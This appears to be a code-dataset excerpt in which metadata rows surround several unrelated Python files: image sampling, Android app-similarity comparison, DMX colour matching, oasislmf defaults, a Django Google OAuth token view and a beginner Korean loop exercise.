| 48.768156 | 281 | 0.627986 | 2,492 | 17,459 | 4.241172 | 0.139246 | 0.037468 | 0.03321 | 0.038603 | 0.629672 | 0.599584 | 0.570631 | 0.547545 | 0.526161 | 0.517551 | 0 | 0.078784 | 0.223552 | 17,459 | 357 | 282 | 48.904762 | 0.700797 | 0.361991 | 0 | 0.174888 | 0 | 0 | 0.028665 | 0.023888 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103139 | false | 0 | 0.058296 | 0.013453 | 0.264574 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc5c9273609531bbca19e97c35f0e5eef3aa812 | 675 | py | Python | offline_tools/processing/create_samples.py | kauevestena/snav | 73b93bc4e5c9d9fc51cbd3559a1d74209d2a7fc9 | [
"MIT"
] | 2 | 2019-05-13T20:46:01.000Z | 2021-02-10T14:06:37.000Z | offline_tools/processing/create_samples.py | kauevestena/snav | 73b93bc4e5c9d9fc51cbd3559a1d74209d2a7fc9 | [
"MIT"
] | null | null | null | offline_tools/processing/create_samples.py | kauevestena/snav | 73b93bc4e5c9d9fc51cbd3559a1d74209d2a7fc9 | [
"MIT"
] | null | null | null | import os
import glob
import random
from processing_functions import misc as msc
from shutil import copyfile
# define the number of samples you want
n_samples = 50
imgsPath = os.environ['HOME']+'/data/extracted_images/2019-07-11-16-21-46/ngr'
out_path = os.environ['HOME']+'/data/extracted_images/samples/'+msc.find_datetime_String(imgsPath)
# print(out_path)
msc.createDir(out_path)
imList = msc.orderedFileList(imgsPath)
n = len(imList)
print(n)
for i in range(n_samples):
imSample = imList[random.randint(0,n-1)]
filename = msc.filenameFromPath(imSample)
# print(filename)
copyfile(imSample,os.path.join(out_path,filename))
print('fim') | 19.285714 | 98 | 0.742222 | 100 | 675 | 4.9 | 0.56 | 0.057143 | 0.053061 | 0.069388 | 0.130612 | 0.130612 | 0 | 0 | 0 | 0 | 0 | 0.030875 | 0.136296 | 675 | 35 | 99 | 19.285714 | 0.809605 | 0.102222 | 0 | 0 | 0 | 0 | 0.145937 | 0.127695 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.294118 | 0 | 0.294118 | 0.117647 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc5d0cf3bc75d730a617fb4405aa3d01d0ee2a9 | 16,626 | py | Python | AppcestryCore/compare.py | jason-chao/appcestry | c3858e51ac27466cb008722453a3cc9882b2e6a1 | [
"MIT"
] | 3 | 2019-04-04T02:49:40.000Z | 2021-08-31T03:19:47.000Z | AppcestryCore/compare.py | jason-chao/appcestry | c3858e51ac27466cb008722453a3cc9882b2e6a1 | [
"MIT"
] | null | null | null | AppcestryCore/compare.py | jason-chao/appcestry | c3858e51ac27466cb008722453a3cc9882b2e6a1 | [
"MIT"
] | 2 | 2019-04-05T15:06:54.000Z | 2019-08-04T12:21:55.000Z | #!/usr/bin/env python3
# This script compares AppGene files for similiarty
# Run this script in terminal / command line to see the usage of arguments.
import os
import argparse
from sklearn.feature_extraction.text import HashingVectorizer
import json
import re
from sklearn.metrics.pairwise import cosine_similarity
import numpy
import subprocess
import time
from pprint import pprint
import itertools
import gc
import random
import hashlib
hashFeatureNumber = 2 ** 16
nGramRange = (16, 16)
tmpDir = os.path.curdir
jsonStopCharRe = re.compile(",|:|,|{|}|\"")
def getAllFilesOfExtension(rootDir, extension):
"""Traverse a directory tree and find all the files with a specified extension
Args:
rootDir: The directory to traverse
extension: The extension
Returns:
A list of files
"""
fileList = []
for (dirPath, dirNames, fileNames) in os.walk(rootDir):
for baseName in fileNames:
if baseName.endswith(extension):
fileList.append((dirPath, baseName))
return fileList
def customTokenizer(input):
"""Tokenise transformed Smali instructions.
Args:
input: Lines of transformed instructions
Returns:
An array of transformed instructions
"""
return re.split("\n", input)
def getHashVector(content):
"""Get hash vector of transformed Smali instructions.
Args:
input: Lines of transformed instructions
Returns:
Hash vector
"""
hashVectorizer = HashingVectorizer(n_features=hashFeatureNumber, tokenizer=customTokenizer,
ngram_range=nGramRange)
return hashVectorizer.transform([content])
def loadJSONFromFile(filename):
"""A generic function to read a JSON file.
Args:
filename: The full filename for the JSON file
Returns:
The object loaded from JSON
"""
jsonFile = open(filename, "r")
theObject = json.load(jsonFile)
jsonFile.close()
return theObject
def writeTextToBufferDir(baseFilename, text):
"""Write text to a file in the buffer directory.
Args:
baseFilename: Base filename of the target file
text: The text to be written to the file
Returns:
Full filename of the target file
"""
bufferFilename = os.path.join(tmpDir, baseFilename)
bufferFile = open(bufferFilename, "w")
bufferFile.write(text)
bufferFile.close()
return bufferFilename
def getTextSHA256(plaintext):
"""Get the SHA256 hash value of plaintext.
Args:
plaintext: The plaintext
Returns:
Hash value represneted in Hex string
"""
textHash = hashlib.sha256(plaintext)
return "%s" % textHash.hexdigest()
def getHashInArray(arr):
"""Get the SHA256 hash values of elements in an array.
Args:
arr: The array
Returns:
An array of hash values (represneted in Hex string)
"""
return [getTextSHA256(t.encode("utf-8")) for t in arr]
def diffContentPairAsFiles(file1Content, file2Content):
"""Use the operating system's wdiff utility to compare two files.
Args:
file1Content: Content of the first file
file2Content: Content of the second file
Returns:
Result object with properties: union, intersection and ratio
"""
diffResult = {"ratio": float(0), "intersection": float(0), "union": float(0)}
try:
tmpFilename1 = writeTextToBufferDir("_diff_tmp1_{}".format(time.time()), file1Content)
tmpFilename2 = writeTextToBufferDir("_diff_tmp2_{}".format(time.time()), file2Content)
diffOuput = subprocess.run("wdiff -s -1 -2 -3 {} {}".format(tmpFilename1, tmpFilename2), check=False,
stdout=subprocess.PIPE, shell=True).stdout.decode("utf-8")
# Parse the output of wdiff
diffOuput = diffOuput.replace(" word ", " words ").split("\n")
file1ResultSegments = diffOuput[0].split(" ")
file2ResultSegments = diffOuput[1].split(" ")
words = int(file1ResultSegments[file1ResultSegments.index("words") - 1])
if words > 0:
common = float(file1ResultSegments[file1ResultSegments.index("common") - 2])
file1Total = float(file1ResultSegments[file1ResultSegments.index("words") - 1])
file2Total = float(file2ResultSegments[file2ResultSegments.index("words") - 1])
diffResult["union"] = (file1Total + file2Total - common)
diffResult["intersection"] = common
diffResult["ratio"] = float(diffResult["intersection"]) / float(diffResult["union"])
os.remove(tmpFilename1)
os.remove(tmpFilename2)
except:
print("pair diff failed - {} {}".format(tmpFilename1, tmpFilename2))
gc.collect(2)
return diffResult
def diffMarkupPairs(content1, content2):
"""Compare two markup (XML) files by their common attribute-value pairs and common values.
Args:
content1: Extracted attribute-value pairs
content2: Extracted values
Returns:
Result object with properties: byAttributeValuePair and byValue (both of the same structure as the output from diffContentPairAsFiles)
"""
pairResult = {"byAttributeValuePair": None, "byValue": None}
content1 = jsonStopCharRe.sub("", content1)
content2 = jsonStopCharRe.sub("", content2)
if not ((not content1) and (not content2)):
pairResult["byAttributeValuePair"] = diffContentPairAsFiles(content1.replace(" ", "_").replace("\n", " "),
content2.replace(" ", "_").replace("\n", " "))
pairResult["byValue"] = diffContentPairAsFiles(content1.replace("\n", " "),
content2.replace("\n", " "))
return pairResult
def getJaccardSimilarity(arr1, arr2):
"""Get the Jaccard similarity of two arrays
Args:
arr1: The first array
arr1: The second array
Returns:
Result object with properties: union, intersection and ratio
"""
jaccardSimResult = {"ratio": float(0),
"intersection": float(len(numpy.intersect1d(arr1, arr2, assume_unique=True))),
"union": float(len(numpy.union1d(arr1, arr2)))}
if jaccardSimResult["union"] > float(0):
jaccardSimResult["ratio"] = jaccardSimResult["intersection"] / jaccardSimResult["union"]
return jaccardSimResult
def getEmptyJaccardResult():
"""Get as empty Jaccard similarity result object.
Returns:
Result object with properties: union, intersection and ratio (all values are 0)
"""
return {"ratio": 0, "intersection": 0, "union": 0}
def compareGenes(gene1, gene2):
"""Compare a pair of AppGene objects
Args:
gene1: The first AppGene object
gene2: The second AppGene object
Returns:
Result object with properties:
smali:
cosineSimilarity: The cosine similarity of the hash vectors of AppGene pairs
byLine: The union, intersection and ratio (Jaccard Similarity) of transformed Smali instructions by line
1-gram: The union, intersection and ratio (Jaccard Similarity) of transformed Smali instructions by opcode and argument
namespace: The union, intersection and ratio (Jaccard Similarity) of namespaces (code package names in full)
markup:
names: The union, intersection and ratio (Jaccard Similarity) of attribute names in markup (XML) files
values: The union, intersection and ratio (Jaccard Similarity) of attribute values in markup (XML) files
media:
exactDuplicates: The union, intersection and ratio (Jaccard Similarity) of pHash (perceptual hash) values of image files
nearDuplicates: The union, intersection and ratio (Jaccard Similarity) of SHA256 values of all other resource files
permission:
android: The union, intersection and ratio (Jaccard Similarity) of Android permissions
non-android: The union, intersection and ratio (Jaccard Similarity) of custom permissions
"""
result = {"smali": {}, "namespace": {}, "markup": {}, "media": {}, "permission": {}}
try:
print("Comparing vectorised code ...")
result["smali"]["cosineSimilarity"] = cosine_similarity(gene1["features"]["smaliVector"],
gene2["features"]["smaliVector"]).item(0)
except:
print("Failed to compare vectorised code")
result["smali"]["cosineSimilarity"] = 0
try:
print("Comparing disassembled code ...")
result["smali"]["byLine"] = diffContentPairAsFiles(gene1["smali"].replace(" ", "_"),
gene2["smali"].replace(" ", "_"))
result["smali"]["1-gram"] = diffContentPairAsFiles(gene1["smali"].replace("\n", " "),
gene2["smali"].replace("\n", " "))
except:
print("Failed to compare disassembled code")
result["smali"]["byLine"] = getEmptyJaccardResult()
result["smali"]["1-gram"] = getEmptyJaccardResult()
try:
print("Comparing permissions ...")
result["permission"] = {
"android": getJaccardSimilarity([pf for pf in gene1["permission-feature"] if pf.startswith("android.")],
[pf for pf in gene2["permission-feature"] if pf.startswith("android.")]),
"non-android": getJaccardSimilarity(
[pf for pf in gene1["permission-feature"] if not pf.startswith("android.")],
[pf for pf in gene2["permission-feature"] if not pf.startswith("android.")])}
except:
print("Failed to compare permissions")
result["permission"]["android"] = getEmptyJaccardResult()
result["permission"]["non-android"] = getEmptyJaccardResult()
try:
print("Comparing namespaces ...")
result["namespace"] = getJaccardSimilarity(gene1["namespace"], gene2["namespace"])
except:
print("Failed to compare namespaces")
result["namespace"] = getEmptyJaccardResult()
try:
print("Comparing media files ...")
result["media"]["exactDuplicates"] = getJaccardSimilarity(gene1["features"]["media_sha256"],
gene2["features"]["media_sha256"])
result["media"]["nearDuplicates"] = getJaccardSimilarity(gene1["features"]["media_phash"],
gene2["features"]["media_phash"])
except:
print("Failed to media files")
result["media"]["exactDuplicates"] = getEmptyJaccardResult()
result["media"]["nearDuplicates"] = getEmptyJaccardResult()
try:
print("Comparing markup files ...")
result["markup"]["names"] = getJaccardSimilarity(getHashInArray(gene1["markup"]["names"]),
getHashInArray(gene2["markup"]["names"]))
result["markup"]["values"] = getJaccardSimilarity(getHashInArray(gene1["markup"]["values"]),
getHashInArray(gene2["markup"]["values"]))
except:
print("Failed to markup files")
result["markup"]["names"] = getEmptyJaccardResult()
result["markup"]["values"] = getEmptyJaccardResult()
return result
def computeFeatures(geneObject):
"""Vectorise and Smali code and hash the resource files.
Args:
geneObject: AppGene object
Returns:
The AppGene object with a new property "features" with properties:
smaliVector: The hash vector of transformed Smali code
media_phash: List of pHash (perceptual hash) values of image files
media_sha256: List of SHA256 values of all other resource files
"""
geneObject["features"] = {}
geneObject["features"]["smaliVector"] = getHashVector(geneObject["smali"])
geneObject["features"]["media_phash"] = list(geneObject["media"]["phash"].keys())
geneObject["features"]["media_sha256"] = list(geneObject["media"]["sha256"].keys())
return geneObject
def dumpObjectAsJson(obj, filename):
"""Write/dump an object to a JSON file.
Args:
obj: The object to be dumped
filename: The full filename of the target file
Returns:
None
"""
outputFileHandler = open(filename, "w")
json.dump(obj, outputFileHandler, indent=4, ensure_ascii=False, sort_keys=True)
outputFileHandler.close()
def comparePair(geneFilename1, geneFilename2):
"""Load two AppGenes from JSON files and pass them to the compareGenes function.
Args:
geneFilename1: The object to be dumped
geneFilename2: The full filename for the target file
Returns:
The same result object as the compareGenes function, supplemented by a new property "pair": an array containing the ids and version codes of the two AppGenes (see the code below for the structure).
"""
result = None
print("About to process {} and {}".format(geneFilename1, geneFilename2))
try:
gene1 = loadJSONFromFile(geneFilename1)
gene1 = computeFeatures(gene1)
gene2 = loadJSONFromFile(geneFilename2)
gene2 = computeFeatures(gene2)
print("Comparing {} to {}".format(gene1["appID"], gene2["appID"]))
result = compareGenes(gene1, gene2)
result["pair"] = []
result["pair"].extend([{"id": gene1["appID"],
"version": gene1["appVersion"]},
{"id": gene2["appID"],
"version": gene2["appVersion"]}])
except:
print("Comparison failed")
gc.collect()
return result
def compareAppGenesInDir(geneFileList, shuffle):
"""Generate all combinations of AppGene pairs of AppGene files on a list and then compare them.
Args:
geneFileList: List of full filenames for AppGene files
shuffle: (bool) Whether the combinations are shuffled
Returns:
A list of results of compared pairs. (See comparePair and compareGenes functions for the strucutre of the results object for each pair.)
"""
result = []
pairList = list(itertools.combinations(geneFileList, 2))
if shuffle:
random.shuffle(pairList)
for genePair in pairList:
pairResult = comparePair(genePair[0], genePair[1])
if pairResult is not None:
result.append(pairResult)
dumpObjectAsJson(pairResult, os.path.join(tmpDir, "_tmp_pair_result_{}".format(time.time())))
else:
print("Failed to compare pair {} {}".format(genePair[0], genePair[1]))
return result
if __name__ == '__main__':
# The usage of arguemnts is self-explanatory as follows
argParser = argparse.ArgumentParser()
argParser.add_argument("--mode", choices=["single-pair", "all-pairs"], help="Mode of comparison", required=True)
argParser.add_argument("--appgene1", help="AppGene file 1 in single-pair mode")
argParser.add_argument("--appgene2", help="AppGene file 2 in single-pair mode")
argParser.add_argument("--geneDir", help="Directory containing AppGene files in all-pairs mode")
argParser.add_argument("--bufferDir", help="Directory for temporary files",
default=os.getenv("COMPARE_TEMP_DIR", os.path.curdir))
argParser.add_argument("--shuffle", help="Shuffle the order of AppGene pairs (applicable to all-pairs mode only)",
action="store_true")
argParser.add_argument("--outputFile", help="Result file to be saved", required=True)
args = argParser.parse_args()
tmpDir = os.path.realpath(args.bufferDir)
outputResult = {}
if args.mode == "single-pair":
outputResult = comparePair(os.path.realpath(args.appgene1), os.path.realpath(args.appgene2))
elif args.mode == "all-pairs":
geneRootDir = os.path.realpath(args.geneDir)
allAppGeneFiles = list(
os.path.join(geneFile[0], geneFile[1]) for geneFile in getAllFilesOfExtension(geneRootDir, ".appgene"))
outputResult = compareAppGenesInDir(allAppGeneFiles, args.shuffle)
pprint(outputResult)
dumpObjectAsJson(outputResult, args.outputFile)
| 41.669173 | 206 | 0.630218 | 1,682 | 16,626 | 6.200357 | 0.21522 | 0.019561 | 0.023013 | 0.028766 | 0.204622 | 0.136542 | 0.125228 | 0.115927 | 0.088216 | 0.050436 | 0 | 0.015048 | 0.260556 | 16,626 | 398 | 207 | 41.773869 | 0.833252 | 0.2786 | 0 | 0.089202 | 0 | 0.00939 | 0.177205 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075117 | false | 0 | 0.065728 | 0 | 0.211268 | 0.089202 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc7ac4c9568f74a7e2bfcb29110a9c6f879e2fd | 4,561 | py | Python | python/coloralgorithm/coloralgorithm.py | jonolt/dmx-colormatch | 170ac4748f7d4d03e14104a2096cdd11b63d7a0e | [
"Xnet",
"X11"
] | null | null | null | python/coloralgorithm/coloralgorithm.py | jonolt/dmx-colormatch | 170ac4748f7d4d03e14104a2096cdd11b63d7a0e | [
"Xnet",
"X11"
] | 1 | 2021-03-05T19:37:02.000Z | 2021-03-05T19:37:02.000Z | python/coloralgorithm/coloralgorithm.py | jonolt/dmx-colormatch | 170ac4748f7d4d03e14104a2096cdd11b63d7a0e | [
"Xnet",
"X11"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from fixture import FixtureRGB
import math
import time
import numpy as np
def rel_diff(cur, ref) -> float:
if ref == 0:
return cur
return (ref - cur) / ref
def get_max_index(array):
max_index = 0
for i in range(len(array)):
if array[i] > array[max_index]:
max_index = i
return max_index
def get_min_index(array):
min_index = 0
for i in range(len(array)):
if array[i] < array[min_index]:
min_index = i
return min_index
def sign(val):
return math.copysign(1, val)
def divide_array(array, divisor):
for i in range(len(array)):
array[i] = int(array[i] / divisor)
if __name__ == "__main__":
org_rgbc = [1508, 1147, 2873, 5526]
org_dmx = [200, 150, 210]
#org_rgbc = [3333,1186,705,5057]
#org_dmx = [255, 200, 0]
#org_rgbc=[1604,1828,1144, 4597]
#org_dmx=[200, 235, 85]
#org_rgbc = [75,1259,5331,6775]
#org_dmx = [0,0,255]
csvpaths = (
"../data/adj_megatripar_red.csv",
"../data/adj_megatripar_green.csv",
"../data/adj_megatripar_blue.csv",
)
f = FixtureRGB(csvpaths)
# ENTER
dmx = [0, 0, 0]
last_dif_rel = 0
dif_rel = 0
matrix = np.zeros((3, 3), float)
dmx_best = np.zeros((3,3), int)
dif_best = np.zeros(3, float)
index_ch = 0 # index var
index_base_ch = 0 #index abs
repetitions = 0
first_miss = True
initialized = False
updown = 5
# LOOP
for ref in range(3):
for var in range(3):
matrix[ref, var] = rel_diff(org_rgbc[var], org_rgbc[3])
def reset():
global index_ch
global index_base_ch
global repetitions
global first_miss
global updown
global dmx
global initialized
index_ch = 0
repetitions = 0
first_miss = True
initialized = False
updown = 5
dmx = [0, 0, 0]
dmx[index_base_ch] = 255
reset()
while True:
# skip base_ch
index_ch = index_ch%len(dmx)
if index_ch == index_base_ch :
index_ch += 1
continue
last_dif_rel = dif_rel
cur_abs_rgbc = f.in_out(dmx)
dif_rel = pow(rel_diff(cur_abs_rgbc[0], cur_abs_rgbc[3]) - matrix[1, 0], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[1], cur_abs_rgbc[3]) - matrix[2, 1], 2)
dif_rel += pow(rel_diff(cur_abs_rgbc[2], cur_abs_rgbc[3]) - matrix[0, 2], 2)
if not initialized:
initialized = True
last_dif_rel = dif_rel
last_dmx = dmx[index_ch]
print(
f"{repetitions} {index_base_ch} {index_ch} {last_dif_rel:07.4f} {dif_rel:07.4f} {first_miss} [{dmx[0]:03d},{dmx[1]:03d},{dmx[2]:03d}]",
end="\n",
)
if dif_rel > last_dif_rel:
dmx[index_ch] = last_dmx
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
continue
last_dmx = dmx[index_ch]
dmx[index_ch] += updown
if dmx[index_ch] > 255:
dmx[index_ch] = 255
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
elif dmx[index_ch] < 0:
dmx[index_ch] = 0
if first_miss:
first_miss = False
updown = -updown
else:
first_miss = True
index_ch += 1
repetitions += 1
if repetitions == 10:
updown = 1
if repetitions == 30:
dif_best[index_base_ch] = dif_rel
for i in range(len(dmx)):
dmx_best[index_base_ch, i] = dmx[i]
print(f"Mid Result ({index_base_ch}): {dmx_best[index_base_ch]} with {dif_best[index_base_ch]:07.4f} match")
index_base_ch += 1
if index_base_ch==len(dmx):
break
reset()
#input("Enter to continue")
best_max_ch = get_min_index(dif_best)
dmx_final = dmx_best[best_max_ch]
print(f"Final Result: {dmx_final} with {dif_best[best_max_ch]:07.4f} match")
# print(f"")
#time.sleep(0.2)
| 24.923497 | 147 | 0.521377 | 613 | 4,561 | 3.626427 | 0.205546 | 0.059829 | 0.059379 | 0.019793 | 0.329285 | 0.221772 | 0.213225 | 0.213225 | 0.201529 | 0.134053 | 0 | 0.063022 | 0.370314 | 4,561 | 182 | 148 | 25.06044 | 0.711003 | 0.06446 | 0 | 0.354331 | 0 | 0.015748 | 0.093625 | 0.051282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047244 | false | 0 | 0.031496 | 0.007874 | 0.11811 | 0.023622 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cc7f5b2b9f4e310e35dc3ebd0e3ad778fc7d355 | 3,880 | py | Python | oasislmf/utils/defaults.py | strategist922/OasisLMF | 7f30ab061307d27943b3fc1b0262c6200e2cdcf3 | [
"BSD-3-Clause"
] | 1 | 2019-10-25T03:15:14.000Z | 2019-10-25T03:15:14.000Z | oasislmf/utils/defaults.py | strategist922/OasisLMF | 7f30ab061307d27943b3fc1b0262c6200e2cdcf3 | [
"BSD-3-Clause"
] | null | null | null | oasislmf/utils/defaults.py | strategist922/OasisLMF | 7f30ab061307d27943b3fc1b0262c6200e2cdcf3 | [
"BSD-3-Clause"
] | null | null | null | __all__ = [
'get_config_profile',
'get_default_accounts_profile',
'get_default_deterministic_analysis_settings',
'get_default_exposure_profile',
'get_default_fm_aggregation_profile',
'get_default_unified_profile',
'get_loc_dtypes',
'get_acc_dtypes',
'get_scope_dtypes',
'get_info_dtypes',
'KTOOLS_ALLOC_RULE_IL',
'KTOOLS_ALLOC_RULE_GUL',
'KTOOLS_FIFO_RELATIVE',
'KTOOLS_DEBUG',
'KTOOLS_MEM_LIMIT',
'KTOOLS_NUM_PROCESSES',
'OASIS_FILES_PREFIXES',
'SUMMARY_MAPPING',
'SUMMARY_OUTPUT',
'SOURCE_IDX',
'SOURCE_FILENAMES',
'STATIC_DATA_FP',
'WRITE_CHUNKSIZE'
]
import os
from collections import OrderedDict
from .data import (
get_json,
)
SOURCE_FILENAMES = OrderedDict({
'loc': 'location.csv',
'acc': 'account.csv',
'info': 'reinsinfo.csv',
'scope': 'reinsscope.csv'
})
# Store index from merged source files (for later slice & dice)
SOURCE_IDX = OrderedDict({
'loc': 'loc_idx',
'acc': 'acc_idx',
'info': 'info_idx',
'scope': 'scope_idx'
})
SUMMARY_MAPPING = OrderedDict({
'gul_map_fn': 'gul_summary_map.csv',
'fm_map_fn': 'fm_summary_map.csv'
})
SUMMARY_OUTPUT = OrderedDict({
'gul': 'gulsummaryxref.csv',
'il': 'fmsummaryxref.csv'
})
# Path for storing static data/metadata files used in the package
STATIC_DATA_FP = os.path.join(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)), '_data')
# Default profiles that describe the financial terms in the OED acc. and loc.
# (exposure) files, as well as how aggregation of FM input items is performed
# in the different OED FM levels
def get_default_accounts_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_acc_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_default_exposure_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_loc_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_config_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'config_compatibility_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_default_unified_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_unified_profile.json')
return get_json(src_fp=fp) if not path else fp
def get_default_fm_aggregation_profile(path=False):
fp = os.path.join(STATIC_DATA_FP, 'default_fm_agg_profile.json')
return {int(k): v for k, v in get_json(src_fp=fp).items()} if not path else fp
def get_loc_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'loc_dtypes.json')
return get_json(src_fp=fp)
def get_acc_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'acc_dtypes.json')
return get_json(src_fp=fp)
def get_scope_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'scope_dtypes.json')
return get_json(src_fp=fp)
def get_info_dtypes():
fp = os.path.join(STATIC_DATA_FP, 'info_dtypes.json')
return get_json(src_fp=fp)
WRITE_CHUNKSIZE = 2 * (10 ** 5)
# Default name prefixes of the Oasis input files (GUL + IL)
OASIS_FILES_PREFIXES = OrderedDict({
'gul': {
'complex_items': 'complex_items',
'items': 'items',
'coverages': 'coverages',
},
'il': {
'fm_policytc': 'fm_policytc',
'fm_profile': 'fm_profile',
'fm_programme': 'fm_programme',
'fm_xref': 'fm_xref',
}
})
# Default analysis settings for deterministic loss generation
def get_default_deterministic_analysis_settings(path=False):
fp = os.path.join(STATIC_DATA_FP, 'analysis_settings.json')
return get_json(src_fp=fp) if not path else fp
# Defaults for Ktools runtime parameters
KTOOLS_NUM_PROCESSES = -1
KTOOLS_MEM_LIMIT = False
KTOOLS_FIFO_RELATIVE = False
KTOOLS_ALLOC_RULE_IL = 2
KTOOLS_ALLOC_RULE_GUL = 1 # 1 = new item stream, 0 = use prev Coverage stream
KTOOLS_DEBUG = False
| 26.758621 | 107 | 0.70799 | 566 | 3,880 | 4.524735 | 0.227915 | 0.0328 | 0.056228 | 0.051542 | 0.380711 | 0.315502 | 0.315502 | 0.307302 | 0.248731 | 0.235845 | 0 | 0.002813 | 0.175258 | 3,880 | 144 | 108 | 26.944444 | 0.7975 | 0.132732 | 0 | 0.138614 | 0 | 0 | 0.30462 | 0.101043 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09901 | false | 0 | 0.029703 | 0 | 0.227723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cca040e273e226a19dc1e216e57277c3625c810 | 1,107 | py | Python | api/views.py | aleattene/ASD-Management | 3824ad1697eecf8c052e56bed9bbe53eddd71d00 | [
"MIT"
] | null | null | null | api/views.py | aleattene/ASD-Management | 3824ad1697eecf8c052e56bed9bbe53eddd71d00 | [
"MIT"
] | 21 | 2021-07-22T08:32:24.000Z | 2022-02-16T10:38:24.000Z | api/views.py | aleattene/asd-management-webapp-responsive | 3824ad1697eecf8c052e56bed9bbe53eddd71d00 | [
"MIT"
] | null | null | null | import requests
import json
from environs import Env
from django.http import HttpResponse, HttpResponseBadRequest, HttpRequest
from django.views.decorators.csrf import csrf_exempt, csrf_protect
env = Env()
@csrf_exempt
# @api_view(['POST'])
def request_access_token(request):
client_secret = env.str("GOOGLE_CLIENT_SECRET")
print(request.headers)
print(request.body)
data_request = json.loads(request.body)
print(data_request["code"])
url = "https://oauth2.googleapis.com/token"
payload = {
"code": data_request["code"],
"client_id": data_request["client_id"],
"client_secret": client_secret,
"redirect_uri": "https://asdmanagement.netlify.app/callback/",
"grant_type": "authorization_code"
}
response = requests.post(url, params=payload)
print(response.headers)
print(response.text)
if response.status_code == 200:
return HttpResponse(response, status=200, content_type='application/json')
else:
return HttpResponse(response.status_code)
if __name__ == "__main__":
request_access_token() | 29.131579 | 82 | 0.707317 | 130 | 1,107 | 5.769231 | 0.469231 | 0.064 | 0.048 | 0.085333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007659 | 0.174345 | 1,107 | 38 | 83 | 29.131579 | 0.81291 | 0.017164 | 0 | 0 | 0 | 0 | 0.188592 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.166667 | 0 | 0.266667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9ccc6cbd9c91a838175af4e8950b1d1c84a28033 | 555 | py | Python | Lab04.py | gksmfzz1/JavaProject | 6b22badf8052a66928ab3ef2f60e83bfa54466c1 | [
"Apache-2.0"
] | null | null | null | Lab04.py | gksmfzz1/JavaProject | 6b22badf8052a66928ab3ef2f60e83bfa54466c1 | [
"Apache-2.0"
] | null | null | null | Lab04.py | gksmfzz1/JavaProject | 6b22badf8052a66928ab3ef2f60e83bfa54466c1 | [
"Apache-2.0"
] | null | null | null | # 30 while문을 이용 100이상10000미만 5의배수 합구하기
number = 100
isloot = True
sumnum = 0
while isloot:
if number >= 10000:
isloot = False
sumnum += number
number += 5
print(sumnum)
# 34 화씨(F)를 섭씨(c)로 변환하는 프로그램 작성
# 섭씨 = (100/180) x (화씨 - 32)
F = 0
C = 0
isloot = True
while isloot:
F = int(input('섭씨로 변환하려는 화씨를 입력하세요 종료(0입력)'))
if F > 0 :
C = (100/180)*(F-32)
print('섭씨는 %d 입니다' % (C))
elif F == 0:
print('프로그램을 종료합니다')
isloot = False
else:
print('숫자로 입력하세요')
# 35 잔돈 계산 프로그램
